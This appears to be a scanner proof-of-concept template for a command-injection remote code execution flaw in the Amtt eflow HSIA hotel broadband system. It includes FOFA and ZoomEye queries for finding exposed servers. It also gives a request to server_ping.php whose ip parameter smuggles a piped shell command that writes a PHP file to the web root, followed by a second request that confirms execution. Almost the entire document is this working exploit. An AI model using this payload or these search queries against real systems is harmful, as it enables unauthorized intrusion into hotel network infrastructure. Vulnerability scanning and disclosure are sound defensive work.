漏洞描述
fofa: title="酒店宽带运营系统"
zoomeye: app="安美数字酒店宽带运营系统"
id: amtt-eflow-hsia-server-ping-rce
info:
name: Amtt eflow Hsia Server Ping RCE
author: YekkoY
severity: high
verified: false
description: |-
fofa: title="酒店宽带运营系统"
zoomeye: app="安美数字酒店宽带运营系统"
reference:
- https://amttgroup.com/product-01-HSIA.html
tags: amtt,eflow,hsia,rce
created: 2023/10/25
set:
r2: randomLowercase(10)
rules:
r0:
request:
method: GET
path: /manager/radius/server_ping.php?ip=127.0.0.1|echo%20"<?php%20echo%20md5({{r2}});unlink(__FILE__);?>">../../{{r2}}.php&id=1
expression: response.status == 200 && response.body.bcontains(b"parent.doTestResult")
r1:
request:
method: GET
path: /{{r2}}.php
expression: response.status == 200 && response.body.bcontains(bytes(md5(r2)))
expression: r0() && r1()